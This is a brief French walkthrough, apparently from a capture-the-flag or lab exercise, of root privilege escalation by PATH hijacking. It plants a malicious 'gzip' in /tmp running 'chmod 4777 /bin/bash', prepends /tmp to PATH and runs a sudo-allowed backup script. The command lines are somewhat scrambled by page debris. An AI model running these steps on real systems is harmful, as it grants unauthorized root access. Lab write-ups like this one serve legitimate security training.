Nous listons les permissions sudo :
sudo -l
Nous trouvons un script exécutable en tant que root utilisant gzip sans chemin absolu.
gzip
Nous créons un fichier gzip malveillant dans /tmp/ :
/tmp/
Nous modifions la variable PATH pour prioriser /tmp/ :
PATH
Nous exécutons le script en tant que root :
Mis à jour il y a 11 mois
chmod 4777 /bin/bash
export PATH=/tmp/:$PATH
sudo /opt/scripts/access_backup.sh
